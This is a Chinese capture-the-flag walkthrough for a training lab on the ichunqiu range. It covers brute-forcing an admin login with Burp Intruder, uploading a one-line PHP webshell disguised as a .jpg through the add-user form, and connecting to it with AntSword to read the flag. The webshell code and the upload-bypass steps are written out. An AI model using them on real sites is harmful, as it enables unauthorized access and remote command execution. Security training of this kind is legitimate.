一、使用工具
1.burpsuite
burpsuite下载教程(含下载资源):
https://blog.youkuaiyun.com/weixin_62808713/article/details/128719786#comments_29865426
2.中国蚁剑
百度网盘下载链接:
链接:https://pan.baidu.com/s/1KwOG436XKODbbX8hhOF8kA
提取码:eval
3.弱口令字典(burpsuite中要用到)
在网上下载一个,用来爆破账号和密码。
二、开始复现漏洞
一、打开场景(在春秋云镜中搜索漏洞编号)
网址:https://yunjing.ichunqiu.com/
二、爆破账号和密码
在账号和密码处任意填入,例如我填的都是a
在burpsuite中打开拦截(点击intercept is off )
再返回靶场中点击log in登录 ,可以看到burpsuite抓取到了包。点击右键,选择send to Intruder
点击Intruder。在攻击类型中选择Cluster bomb
现在开始设置变量,我们只需要账号和密码作为变量。所以点击clear清除掉所有变量,然后分别选中我们刚才随意输入的账号和密码,点击add。可以看到现在只有我刚刚输入的账号和密码都设置成了变量
点击payloads,我们先构造用户名。在load中可以导入你的字典,然后在add from list 中选择usernames
然后构造密码,在payload中选择2。导入字典后,在add from list中选择passwords
注:作者这里为了节约时间并没有导入字典,而是手动添加了少数几个账号和密码。(因为已经知道了一个账号和密码)。用较大字典来爆破往往会花费较长时间,爆破的原理就是把字典中的账号和密码两两匹配,穷举完所有的可能。例如:100个账号和50个密码,则要进行5000次爆破
设置完成后,我们点击start attack开始攻击。可以看到在length那一列,有一个数值与其他的不同,这就对应正确的账号和密码。也就是admin和admin
三、上传木马文件
把拦截关掉之后,我们成功进入了这个网站。点击右上角的admin
再点击 users中的add user
现在构造一句话木马:<?php @eval($_POST['hack']); ?>
把这段木马写入一个文本文件里。然后把这个文件的后缀改成.jpg
进入到邮件发送页面。带星号的都是必须要填入的信息。都可以随意填入,retype password是重复填入密码。role选择administrator。在浏览的位置选择我们刚才构造好的木马文件
准备好之后,我们在burpsuite中打开拦截。然后点击add user。可以看到我们刚刚上传的22.jpg文件,把它的后缀改成php,也就是改成22.php。然后我们再关闭拦截,让篡改后的包被接收。
在靶场中,把网址修改到images目录下
进入后我们能看到刚刚上传的文件22.php,说明成功上传了
四、连接木马文件
现在打开蚁剑,右键点击添加数据
在URL地址处填入我们刚刚查看文件目录处的网址,并且在后面加上 我们上传的木马文件名。
密码我们填入hack。因为在这句木马中<?php @eval($_POST['hack']); ?>,我们设置的密码是hack,当然,你也可以设置成你想要的。
点击测试连接。如下图则表示连接成功。再点击添加
注:如果连接失败可能是1.因为没有关防火墙(虽然作者也没关,哈哈哈)
2.也不要使用代理,使用代理也可能会失败。
3.木马写错了,POST一定要大写
4.也许是存放木马的文档有问题,作者试过用word文档结果失败了。用记事本就可以
添加好后我们双击刚刚添加好的数据,找到我们上传的木马文件,右键,选择在此处打开终端
1.输入命令 cd / (切换到根目录)
2.输入命令ls (查看根目录的所有文件)
3.输入命令cat flag (查看flag文件)
成功拿到flag!!
好了,这篇文章到这里就结束了。如果作者成功帮到你的话,给我点个赞就是对我最大的支持。
如果还有其它问题,欢迎在评论区留言!